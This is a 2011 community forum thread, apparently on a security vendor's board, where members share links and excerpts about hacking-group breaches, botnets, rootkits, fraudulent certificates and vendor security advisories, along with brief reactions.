-
Continuing the Fail so Epic, it will rattle the bones of thy ancestors, Sony gets hacked again.
http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/
wondering how well some "I Pwnd Sony" T-shirts would sell if I printed them up, since this is obviously fashionable now :P
-
And in other news, a 2 headed monster formed with the intention of tearing things down with no idea what to replace them with. ::)
http://news.cnet.com/8301-27080_3-20072675-245/lulzsec-anonymous-announce-hacking-campaign/
Its formidable powers include Email theft, leaking private docs, DDoS, cannon fire w/ lizard blood, Lazors, and a skin hardened by 7 proxies.
This monster would be called by some name (Lulnonymous?), but one of its heads (the one that looks like a faceless suit) refuses all attempts at being named.
ok, done having fun now....
-
Attack on Israeli Certificate Authority
http://www.h-online.com/security/news/item/Attack-on-Israeli-Certificate-Authority-1264008.html
-
Operation Anti-Security
LulzSec and Anonymous did ally
https://twitter.com/LulzSec/status/82667686647177216
http://pastebin.com/9KyA0E5v
[Edit] More info: http://www.h-online.com/security/news/item/Hacker-organisations-join-forces-1264337.html
-
Continuing the Fail so Epic, it will rattle the bones of thy ancestors, Sony gets hacked again.
http://news.cnet.com/8301-31021_3-20072668-260/hackers-claim-177k-e-mails-from-sony-pictures-france/
wondering how well some "I Pwnd Sony" T-shirts would sell if I printed them up, since this is obviously fashionable now :P
OT: Actually, that's a really good idea! Better get on it before t-shirt hell or busted tees does! ;D
-
Suspected LulzSec leader arrested
http://www.zdnet.com/blog/btl/lulzsec-is-it-too-cocky-for-its-own-good/51078?tag=nl.e589
-
Suspected LulzSec leader arrested
Hmmm...???
https://twitter.com/anonymouSabu/status/83159348712452096
-
Suspected LulzSec leader arrested
Hmmm...???
https://twitter.com/anonymouSabu/status/83159348712452096
For what that's worth. I wouldn't believe anything any of those guys said even if their tongues were notarized. ;D
-
For what that's worth. I wouldn't believe anything any of those guys said even if their tongues were notarized. ;D
You're right about that. Guess we should wait and see. ;)
Btw, a quote from your posted link:
Note that this man in custody may not be the LulzSec leader, notes ZDNet UK.
Anyway, we shouldn't fill this thread with OT stuff...
-
WordPress - Passwords Reset
https://wordpress.org/news/2011/06/passwords-reset/
-
Department of Justice Disrupts International Cyber Crime Rings Distributing Scareware
http://www.fbi.gov/news/pressrel/press-releases/department-of-justice-disrupts-international-cybercrime-rings-distributing-scareware
-
Department of Justice Disrupts International Cyber Crime Rings Distributing Scareware
http://www.fbi.gov/news/pressrel/press-releases/department-of-justice-disrupts-international-cybercrime-rings-distributing-scareware
nice :)
-
nice :)
Yep. :)
Seldom, that we can post some good news here...
-
I don't know if this is the right place to post this, but I get a virus warning that I never got before when I visit two sites that enable me to listen to Philadelphia fire radio. The virus description is:
SWF:Chainer[Heur]
C:\Users\Bill\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\10NS0UUU\ep_player[1].swf
This never happened before, like I said. I asked someone who uses AVG and they don't get a warning. I'm a computer novice so I don't know what's going on, but at least avast is catching it if it's not a false positive. Thanks. My avast is up to date, using Windows 7.
The sites are:
eastcoast911.com, then you have to click on the "live feeds" and select the fire dept. The other is http://www.radioreference.com/apps/audio/?ctid=2291, and then you have to click on the feed for the Philadelphia fire. Thanks for any help you can give.
-
I don't know if this is the right place to post this...
No, it isn't. ;)
http://forum.avast.com/index.php?board=4.0
-
OK, I posted in that thread.
-
LulzSec retires...!??
I just quote the text part of the (pastebin) message, links were removed.
Friends around the globe,
We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.
For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.
While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn't that interesting to know? The mediocre painter turned supervillain liked cats more than we did.
Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.
So with those last thoughts, it's time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind - we hope - inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.
Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.
Let it flow...
Lulz Security - our crew of six wishes you a happy 2011, and a shout-out to all of our battlefleet members and supporters across the globe
Update: Maybe related to this msg (see screenshot)..!?? ;)
Update #2: http://www.h-online.com/security/news/item/Last-LOL-for-LulzSec-as-hackers-disband-group-1268090.html
-
The only "oppressors" I saw in the whole situation were LulzSec themselves. Exposing thousands of people to security breaches they themselves caused. I don't believe for a second that they're gone. They've just gone on the lam and I hope they still get caught.
-
TDL4-TOP BOT
http://www.securelist.com/en/analysis/204792180/TDL4_Top_Bot
-
Hackers breached Citibank security using simple URL manipulation
http://www.h-online.com/security/news/item/Hackers-breached-Citibank-security-using-simple-URL-manipulation-Update-1260964.html
http://www.reuters.com/article/2011/06/16/us-citigroup-idUSTRE75F0RU20110616
Citibank customers lost $2.7 million in recent attack
http://www.h-online.com/security/news/item/Citibank-customers-lost-2-7-million-in-recent-attack-1268302.html
http://online.wsj.com/article/SB10001424052702303339904576406141349840916.html?KEYWORDS=citigroup
-
Rootkit Infection Requires Windows Reinstall, Says Microsoft
"Microsoft is telling Windows users that they'll have to reinstall the operating system if they get infected with a new rootkit that hides in the machine's boot sector."
http://www.pcworld.com/article/231255/rootkit_infection_requires_windows_reinstall_says_microsoft.html#tk.nl_dnx_h_crawl
-
Hi Marc57,
Scary, or you should have this stand-alone micro-tool and have used it as a precaution:
http://hdhacker.software.informer.com/ download this tool from the developer page: http://dimio.altervista.org/stats/download.php?id=6 (developer of Dimio's Tools = Dimitrios Coutsoumbas)
polonus
-
Not sure, polonus, because of this line in the story:
"According to Feng, Popureb detects write operations aimed at the MBR -- operations designed to scrub the MBR or other disk sectors containing attack code -- and then swaps out the write operation with a read operation.
Although the operation will seem to succeed, the new data is not actually written to the disk. In other words, the cleaning process will have failed."
Let's just hope our A/V catches it before it gets in.
-
Polonus! Great to see you back dude!
We missed you on the forum here!
Hope you are here to stay? :o
-
Rootkit Infection Requires Windows Reinstall, Says Microsoft
"Microsoft is telling Windows users that they'll have to reinstall the operating system if they get infected with a new rootkit that hides in the machine's boot sector."
http://www.pcworld.com/article/231255/rootkit_infection_requires_windows_reinstall_says_microsoft.html#tk.nl_dnx_h_crawl
This is actually overhyped and inflated to make a good news story - it is a basic TDL with a few bells and whistles. There are some inaccuracies. A reformat will not replace the MBR - you need to repartition the drive to clear the old and get a new one.
If your system does get infected with Trojan:Win32/Popureb.E, we advise you to fix the MBR and then use a recovery CD to restore your system to a pre-infected state (as sometimes restoring a system may not restore the MBR). To fix the MBR, we advise that you use the System Recovery Console, which supports a command called "fixmbr".
Chun Feng. In this instance a recovery CD would be the manufacturer's factory reset disc, which does wipe the disc clean and start afresh. And here is the disparity: if it can't be cleared, why use the recovery console? Or if that will cure it, why reinstall?
-
Thanks essexboy.
-
Human Errors Fuel Hacking as Test Shows Nothing Stops Idiocy
http://www.bloomberg.com/news/print/2011-06-27/human-errors-fuel-hacking-as-test-shows-nothing-prevents-idiocy.html
-
Never a truer statement, why do you think they plaster "Do Not Click" buttons on videos (etc.)? People just can't resist the temptation/challenge, common sense goes out the window.
-
US authorities have access to European cloud data
http://www.h-online.com/security/news/item/US-authorities-have-access-to-European-cloud-data-1270961.html
http://www.zdnet.com/blog/igeneration/microsoft-admits-patriot-act-can-access-eu-based-cloud-data/11225
-
Hi, I'm an Avast user, not regular poster here but I do read a lot of the stuff. Saw this in a free paper we get in the UK, thought it might be worth passing on :-
"At least 4.5million PCs, including 200,000 in Britain, have been hit in just three months.
They are now part of a vast botnet – a network of private computers infected with malicious software and controlled without the owners’ knowledge. It has been branded by analysts as the ‘most sophisticated threat today’.
The PCs were captured using a bug called TDL-4 – the latest version of a long-standing malware series, which targets Windows machines and hides itself in hard drives, well away from standard anti-virus programmes.
The creators could stand to make millions by ‘renting’ space on the infected network to other cyber criminals.
They pay small fees to ‘affiliate’ hackers to help spread the botnet and receive between £12 and £120 for every 1,000 installations, which are often conducted via pornographic or ‘bootleg’ sites and video and file storage services.
Kaspersky Lab security researchers claim the hackers are ‘essentially trying to create an indestructible botnet that is protected against attacks, competitors and antivirus companies’.
More than 30 per cent of all victims so far are in the US, with seven per cent in India and five per cent in Britain.
A single group is believed to be behind the botnet, which has its own anti-virus code that scans the infected machine for other malicious programmes and deletes them to see off any rival cyber attackers.
Ram Herkanaidu, from Kaspersky, added: ‘As long as the botnet master gets paid they don’t really mind. It can be used for anything really."
http://www.metro.co.uk/tech/868005-at-least-4-5million-pcs-hit-by-indestructible-tdl-4-botnet
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
Hmm...a bit more sinister than what we used to do in school...plug our mouse into someone else's computer when they weren't looking...Great fun... ;D ;D
-
Plug mouse into the computer - be compromised
http://norman.com/security_center/security_center_archive/2011/plug_mouse_into_the_computer_be_compromised/en
More here: http://forum.avast.com/index.php?topic=66267.msg660925#msg660925
-
New banking trojan named Sunspot challenges ZeuS-SpyEye
http://www.theregister.co.uk/2011/05/11/sunspot_banking_trojan/
-
Alert: vsftpd download backdoored
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
-
Computer-Hacking Group Targets Apple In Latest Attack
http://online.wsj.com/article/SB10001424052702304803104576424573989176378.html?mod=rss_Technology
-
Computer-Hacking Group Targets Apple In Latest Attack
http://online.wsj.com/article/SB10001424052702304803104576424573989176378.html?mod=rss_Technology
'bout time.
-
Anonymous: Italian police report arrests
http://www.h-online.com/security/news/item/Anonymous-Italian-police-report-arrests-1274052.html
http://ansa.it/web/notizie/rubriche/english/2011/07/05/visualizza_new.html_789705132.html
-
Microsoft Releases New Threat Data on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
-
Washington Post jobs site breached
http://www.washingtonpost.com/wp-srv/jobs/product-pages/fraud-email.html
-
Cybercriminals switch from MBR to NTFS
http://www.securelist.com/en/blog/517/Cybercriminals_switch_from_MBR_to_NTFS
I wonder, what's next? Guess! :D
-
Microsoft Security Bulletin Advance Notification for July 2011
http://www.microsoft.com/technet/security/bulletin/ms11-jul.mspx
-
Nice one:
http://sunbeltblog.blogspot.com/2011/07/interested-in-getting-porn-and-malware.html
-
Twitter security lags some other sites: experts
http://www.reuters.com/article/2011/07/08/us-twitter-idUSTRE7667EL20110708
-
Sun Java JRE Insecure Executable Loading Vulnerability
http://secunia.com/advisories/45173/
-
Anonymous hacks another US government contractor
http://www.h-online.com/security/news/item/Anonymous-hacks-another-US-government-contractor-1277746.html
-
Top Cybercrime Mishaps of 2010 (http://www.securitynewsdaily.com/most-memorable-cybercrime-mishaps-of-2010-0363/)
-
VLC Media Player vulnerable to heap overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-heap-overflow-exploits-1279247.html
-
Skype - Security Advisory
http://www.noptrix.net/advisories/skype_xss.txt
-
Don't panic over latest mac malware story (http://www.securityweek.com/dont-panic-over-latest-mac-malware-story)
-
Oracle Critical Patch Update Pre-Release Announcement - July 2011
http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
-
Rogue Security Software article from microsoft (http://blogs.msdn.com/b/securitytipstalk/archive/2011/06/23/fake-security-software-know-the-risks.aspx)
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
Let's hope this doesn't happen at Gmail as well :-\
-
Hotmail - Report a hacked account of a friend
http://windowsteamblog.com/windows_live/b/windowslive/archive/2011/07/14/hey-my-friend-s-account-was-hacked.aspx
Let's hope this doesn't happen at Gmail as well :-\
Why, it happens to be an excellent addition. Lately I know of quite a few new friends (and at least one relative) who have had their email hijacked.
I wish that ability was available in gmail. :)
-
US presents defence strategy for cyberspace
http://www.h-online.com/security/news/item/US-presents-defence-strategy-for-cyberspace-1279945.html
http://www.defense.gov/news/d20110714cyber.pdf
-
VLC Media Player vulnerable to heap overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-heap-overflow-exploits-1279247.html
Fixed in version 1.1.11
http://www.videolan.org/vlc/
-
Azeri Banks Corner Fake AV, Pharma Market
http://krebsonsecurity.com/2011/07/azeri-banks-corner-fake-av-pharma-market/
-
Microsoft Offers Reward for Information on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/18/microsoft-offers-reward-for-information-on-rustock.aspx
-
Microsoft Offers Reward for Information on Rustock
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/18/microsoft-offers-reward-for-information-on-rustock.aspx
http://krebsonsecurity.com/2011/07/microsoft-offers-250k-bounty-for-rustock-author/ ;)
-
LulzSec Hacks The Times with Brutal Murdoch Death Notice
http://gizmodo.com/5822392/lulzsec-hacks-the-times-with-brutal-murdoch-death-notice
http://gizmodo.com/5822416/antisec-hackers-release-news-of-the-world-chief-rebekah-brooks-email-login
http://www.guardian.co.uk/technology/2011/jul/19/how-lulzsec-hacked-sun-website?intcmp=239
-
Google search: now with malware warnings
http://www.h-online.com/security/news/item/Google-search-now-with-malware-warnings-1282451.html
http://googleblog.blogspot.com/2011/07/using-data-to-protect-people-from.html
http://krebsonsecurity.com/2011/07/google-your-computer-appears-to-be-infected/
-
FBI arrests suspected members of Anonymous
http://www.h-online.com/security/news/item/FBI-arrests-suspected-members-of-Anonymous-1282502.html
-
Microsoft Research Team Reports Bugs in Facebook, Google Picasa
http://threatpost.com/en_us/blogs/microsoft-research-team-reports-bugs-facebook-google-picasa-071911?utm_source=Newsletter_072011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
Google Search Now Displaying Warning About Malware Infections
http://threatpost.com/en_us/blogs/google-search-now-displaying-warning-about-malware-infections-072011?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today%27s+Most+Popular
-
Whilst the Google warning is something to be admired, the problem is that to too many it would look like some fake alert (as mentioned in the article), something which they are no doubt trying to prevent happening with the warning, etc. etc.
-
Targeted attacks on arms manufacturers continue
http://www.h-online.com/security/news/item/Targeted-attacks-on-arms-manufacturers-continue-1283425.html
-
Security Notice for CA Gateway Security and Total Defense
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7B5E404992-6B58-4C44-A29D-027D05B6285D%7D
-
Anonymous hacks NATO servers
http://www.h-online.com/security/news/item/Anonymous-hacks-NATO-servers-1284000.html
-
AnonPlus, Anonymous's social network, is hacked
http://nakedsecurity.sophos.com/2011/07/22/anonplus-anonymouss-social-network-is-hacked/
Quite funny, when the hackers get hacked... ;D
-
Security Advisories for ICQ
http://noptrix.net/advisories/icq_cli_xss.txt
http://noptrix.net/advisories/icq_web_xss.txt
-
Hackers attack South Korean sites; up to 35 mln users affected
http://www.reuters.com/article/2011/07/28/us-hackers-attack-idUSTRE76R19M20110728
-
UK Police arrest man said to be Anonymous's Topiary
http://www.h-online.com/security/news/item/UK-Police-arrest-man-said-to-be-Anonymous-s-Topiary-1286561.html
http://content.met.police.uk/News/Man-arrested-in-ecrime-investigation/1260269333921/1257246745756
-
Microsoft's Web map exposes phone, PC locations
http://news.cnet.com/8301-31921_3-20085028-281/microsofts-web-map-exposes-phone-pc-locations/
-
Skype Client - Remote Session hijacking over Facebook-Integration
http://www.secalert.net/post.php?id=36
-
Everything about "Avast enhanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
-
Everything about "Avast enhanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
Very good article.
-
Everything about "Avast enhanced protection mode"
http://xylibox.blogspot.com/2011/07/trojanfakeavlvt.html
Very good article.
Also, http://www.malwarecity.com/blog/trojanfakeavlvt-plays-you-like-in-movies-1114.html
-
Facebook to pay for security hole reports
http://www.h-online.com/security/news/item/Facebook-to-pay-for-security-hole-reports-1315738.html
-
Microsoft's Web map exposes phone, PC locations
http://news.cnet.com/8301-31921_3-20085028-281/microsofts-web-map-exposes-phone-pc-locations/
Microsoft Makes Change to Geographic Location Positioning Service
http://blogs.technet.com/b/privacyimperative/archive/2011/08/01/microsoft-makes-change-to-geographic-location-positioning-service.aspx
-
Timthumb PHP script opens hole in WordPress blogs
http://www.h-online.com/security/news/item/Timthumb-PHP-script-opens-hole-in-WordPress-blogs-1317479.html
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
-
Governments, IOC and UN hit by massive cyber attack
http://www.bbc.co.uk/news/technology-14387559
-
More about "Avast enhanced protection"
http://blog.eset.com/2011/08/03/win32delf-qcztrust-me-i%E2%80%99m-your-anti-virus
Facebook to pay for security hole reports
http://www.h-online.com/security/news/item/Facebook-to-pay-for-security-hole-reports-1315738.html
Easy money, huh? ;)
-
QuickTime 7.7 closes security holes
http://www.h-online.com/security/news/item/QuickTime-7-7-closes-security-holes-1318119.html
-
Microsoft Security Bulletin Advance Notification for August 2011
http://www.microsoft.com/technet/security/bulletin/ms11-aug.mspx
-
Diversification of attack vectors
http://www.norman.com/security_center/security_center_archive/2011/diversification_of_attack_vectors/en-us
During the Black Hat security conference in Las Vegas, USA, the security researcher Charlie Miller presented a method for compromising the batteries that are shipped with several of Apple's Mac computers.
Battery Firmware Hacking, Dr. Charlie Miller Black Hat USA 2011
http://www.accuvant.com/capability/accuvant-labs/security-research/featured-presentation
-
Twitter-controlled botnet mines Bitcoins
http://www.h-online.com/security/news/item/Twitter-controlled-botnet-mines-Bitcoins-1318497.html
-
Fake Firefox update email
http://nakedsecurity.sophos.com/2011/08/08/fake-firefox-update-email-malware/
-
Infected Cisco Information Packet and Warranty CDs
http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
-
Google also passes on European data to US authorities
http://www.h-online.com/security/news/item/Google-also-passes-on-European-data-to-US-authorities-1319434.html
-
Major security hole in SAP's NetWeaver
http://www.h-online.com/security/news/item/Major-security-hole-in-SAP-s-NetWeaver-1319808.html
-
***
Anonymous Hackers Expose Sensitive Law Enforcement Data
In its latest escapade, global hacker collective Anonymous claimed to release 10 GB of stolen data from more than 70 rural sheriff’s departments across the country (USA), leaking sensitive information that could compromise the agencies' investigations.
The data, which Anonymous hackers posted to Pastebin.com, was sourced to 76 law enforcement agencies’ Web sites in 11 states, including Arkansas, Kansas, Louisiana, Missouri and Mississippi. Most of the Web sites were hosted by Arkansas-based online marketing firm Brooks-Jeffrey Marketing.
http://www.crn.com/news/security/231300433/anonymous-hackers-expose-sensitive-law-enforcement-data.htm?cid=nl_sec
***
-
***
Black Hat: Hackers Can Take Control Of Diabetes Devices
Type 1 diabetics relying on radio frequency transmitting devices for monitoring and dispensing insulin might have one more thing to worry about -- the life-saving medical devices contain vulnerabilities that give potential attackers the ability to end their lives.
http://www.crn.com/news/security/231300351/black-hat-hackers-can-take-control-of-diabetes-devices.htm?cid=nl_sec
***
-
Expert says Adobe omits mention of 400 Flash Player flaws
http://www.h-online.com/security/news/item/Expert-says-Adobe-omits-mention-of-400-Flash-Player-flaws-1321881.html
-
Fake Antivirus Industry Down, But Not Out
http://krebsonsecurity.com/2011/08/fake-antivirus-industry-down-but-not-out/
Huge Decline in Fake AV Following Credit Card Processing Shakeup
http://krebsonsecurity.com/2011/08/huge-decline-in-fake-av-following-credit-card-processing-shakeup/
-
That second link is probably the most important as many of the Credit Card companies need to be more proactive in combating fraud.
-
Fake Firefox update includes trojan
http://www.favbrowser.com/fake-firefox-update-includes-trojan/
-
Anonymous take on San Francisco's rapid transit system
http://www.h-online.com/security/news/item/Anonymous-take-on-San-Francisco-s-rapid-transit-system-1323033.html
-
Anonymous take on San Francisco's rapid transit system
http://www.h-online.com/security/news/item/Anonymous-take-on-San-Francisco-s-rapid-transit-system-1323033.html
Good thing this didn't happen in Feb. when some of us were in San Francisco.
-
Not sure if this has already been posted..........as Asyn is vacuum cleaning the web for news ;D
4800 Aussie sites evaporate after hack....including backup..... D'oh! :-\
http://www.smh.com.au/technology/security/4800-aussie-sites-evaporate-after-hack-20110621-1gd1h.html
-
OpenDNS Teams With D-Link to Deliver the Easiest and Most Effective Router-Based Parental Controls Available, Protect Every Internet-Connected Device in the Household
http://www.opendns.com/about/announcements/223/
-
***
US church websites hacked to post appeal for conversion to Islam
The FBI has launched an investigation after 18 church websites across the United States were hacked and their regular content replaced with an appeal for Christians to convert to Islam.
http://www.barnabasfund.org/US-church-websites-hacked-to-post-appeal-for-conversion-to-Islam.html
***
-
***
Taiwan opposition says computers hacked by Chinese
Taiwan's main opposition party said Tuesday its headquarters has been the target of a sustained hacking attack from China and one instance of hacking from the government in Taipei.
http://www.rdmag.com/News/FeedsAP/2011/08/information-tech-taiwan-opposition-says-computers-hacked-by-chinese/
***
-
***
SSL VPNs pose network security risks
The use of secure sockets layer (SSL) virtual private networks (VPNs) opens up networks to security risks, according to a white paper by NCP Engineering.
The NCP white paper – Debunking the Myths of SSL VPN Security – warns that vulnerabilities are endemic in SSL to the point where banks have their customer data stolen at “an alarming rate" and "web application developers create a false sense of security by trusting the confidence and credibility of a protocol that is likely to fail them before they can get through a single development cycle.”
http://news.hitb.org/content/ssl-vpns-pose-network-security-risks
***
-
***
Fraudster used Facebook to hack bank accounts
A hacker stole £35,000 from his neighbours' online bank accounts after working out the answers to their security questions from information they posted on Facebook and Friends Reunited.
Iain Wood spent up to 18 hours per day online, working out passwords from personal information posted on social networking sites by his acquaintances.
http://www.independent.ie/world-news/europe/fraudster-used-facebook-to-hack-bank-accounts-2848416.html
***
-
Facebook goes down on November 5........... :'( Oh, what am I going to do now??? 
http://www.youtube.com/watch?v=LsbNabK5FDE
http://www.youtube.com/watch?v=aPGYznzgK6M&feature=related
That guy used a translator......... ???
-
Facebook goes down on November 5........... :'( Oh, what am I going to do now???
http://www.forbes.com/sites/parmyolson/2011/08/11/why-the-anonymous-facebook-plot-was-a-dud/
-
German Federal Office for Information Security warns of hacked online shops
http://www.h-online.com/security/news/item/German-Federal-Office-for-Information-Security-warns-of-hacked-online-shops-1323427.html
-
Expert says Adobe omits mention of 400 Flash Player flaws
http://www.h-online.com/security/news/item/Expert-says-Adobe-omits-mention-of-400-Flash-Player-flaws-1321881.html
How Did You Get to that Number?
http://blogs.adobe.com/asset/2011/08/how-did-you-get-to-that-number.html
-
German Federal Office for Information Security warns of hacked online shops
http://www.h-online.com/security/news/item/German-Federal-Office-for-Information-Security-warns-of-hacked-online-shops-1323427.html
Rapid relief for osCommerce administrators
http://www.h-online.com/security/features/Rapid-relief-for-osCommerce-administrators-1324235.html
-
Google Admits Handing over European User Data to US Intelligence Agencies
August 8th, 2011, 15:43 GMT| By Lucian Constantin
Google admits sharing EU data with US government
Google has admitted complying with requests from US intelligence agencies for data stored in its European data centers, most likely in violation of European Union data protection laws.
Gordon Frazer, Microsoft UK's managing director, made news headlines some weeks ago when he admitted that Microsoft can be compelled to share data with the US government regardless of where it is hosted in the world.
http://news.softpedia.com/news/Google-Admits-Handing-over-European-User-Data-to-US-Intelligence-Agencies-215740.shtml
-
Mozilla has now published version 6 of Firefox.
This version fixes eight vulnerabilities which Mozilla has rated critical, as well as two rated high.
http://www.mozilla.org/security/announce/2011/mfsa2011-29.html
-
New malware attack via Facebook
A tricky approach can cause immense damage
The past days brought a new wave of malware attacks via Facebook to German speaking users. Many users received a message via Facebook’s chat functionality that looked something like this:
http://blog.gdatasoftware.com/blog/article/new-malware-attack-via-facebook.html
-
***
Most PCs Contain 12 Vulnerabilities
Despite improvements in secure operating systems and security software, most users’ PCs contain on average around 12 different vulnerabilities, according to a Kaspersky Lab Q2 threat study.
Adobe (NSDQ:ADBE) flaws comprised the vast majority of the 10 most common vulnerabilities, followed by Oracle (NSDQ:ORCL)-Sun-Java glitches. Seven of the top 10 vulnerabilities were found in Adobe Flash Player.
http://www.crn.com/news/security/231500321/kaspersky-report-most-pcs-contain-12-vulnerabilities.htm?cid=nl_sec
***
-
[OT] @Charly: Do you/we really need these huge posts to inform us..?? ;)
-
***
Hackers Unlock, Start Subaru Outback With Cell Phone
Solnik and Bailey have not made public the name of the specific software programs and platforms that they targeted with their text-message attack. The Black Hat demonstration was intended to show automakers that should they not take proper security precautions when developing their automotive software, then it is entirely possible that individuals with less than honorable intentions will gain access to more important systems and cause greater damage. For example, the potential for chaos is amplified should hackers sit in the street after hours in front of a dealership and remotely disable vehicle software on a large scale.
http://www.autobytel.com/subaru/news/hackers-unlock-start-subaru-outback-with-cell-phone-102620/
And if this is possible, it is also possible for hackers to turn off your automobile while you are driving.
***
-
***
Beladen Loads Hacked Web Sites With Badness
At least 40,000 Web sites recently were hacked and retrofitted with instructions that silently attempt to infest visitor PCs with malicious software, security experts warn.
Each hacked site redirects to Web sites that bombard the visitor's PC with about 20 different Web browser vulnerabilities and browser plug-in attacks, targeting older, insecure versions of several third-party applications like QuickTime and Winzip.
This latest mass Web site hack is thought to be separate from a similar recent incident referred to as "Gumblar," so named because an estimated 60,000 domains hijacked over several weeks redirected visitors to a malware-serving Web site named Gumblar.cn, among others.
If you were to visit one of these sites hacked with the Beladen code, you probably wouldn't notice anything amiss. In the background, though, malicious code inserted into the site would force your browser to invisibly contact google-analyt1cs.net (please don't visit this site either), which checks the name of the referring Web site, records the date and time stamp of the visit, and then forwards the victim on to the Beladen site, which then silently attempts to exploit a series of browser vulnerabilities.
http://voices.washingtonpost.com/securityfix/2009/06/beladen_loads_hacked_web_sites.html
***
-
Mac OS X Lion fails to check passwords when authenticating via LDAP
http://www.h-online.com/security/news/item/Mac-OS-X-Lion-fails-to-check-passwords-when-authenticating-via-LDAP-1328704.html
-
UPnP-enabled routers allow attacks on LANs
http://www.h-online.com/security/news/item/UPnP-enabled-routers-allow-attacks-on-LANs-1329727.html
-
Yale oversight exposes 43,000 Social Security numbers
http://news.cnet.com/8301-27080_3-20096355-245/yale-oversight-exposes-43000-social-security-numbers/
http://www.yaledailynews.com/news/2011/aug/17/yale-affiliates-ssns-were-searchable-google/
-
Apache HTTPD Security ADVISORY
http://article.gmane.org/gmane.comp.apache.announce/58
-
Windows Remote Desktop worm "Morto" spreading
http://www.f-secure.com/weblog/archives/00002227.html
http://isc.sans.edu/diary/Increased%2BTraffic%2Bon%2BPort%2B3389/11452
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FMorto.A
-
Hacker steals user data from Nokia developer forum
http://www.h-online.com/security/news/item/Hacker-steals-user-data-from-Nokia-developer-forum-1332867.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
"Google Chrome users were protected from this attack because Chrome was able to detect the fraudulent certificate."
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Thanks Asyn.
For Firefox users, take action! It's not just about reading!
-
1. Thanks Asyn.
2. For Firefox users, take action! It's not just about reading!
1. NP Tech.
2. Fully agree..! (I already did so.)
-
Fraudulent certificate triggers blocking from software companies
https://www.eff.org/deeplinks/2011/08/iranian-man-middle-attack-against-google
http://www.microsoft.com/technet/security/advisory/2607712.mspx
http://blog.mozilla.com/security/2011/08/29/fraudulent-google-com-certificate/
http://support.mozilla.com/en-US/kb/deleting-diginotar-ca-cert
http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html
Fake Google certificate is the result of a hack
http://www.h-online.com/open/news/item/Fake-Google-certificate-is-the-result-of-a-hack-1333728.html
http://www.vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
-
***
Fake Anti-Virus, Social Network Scams On The Rise
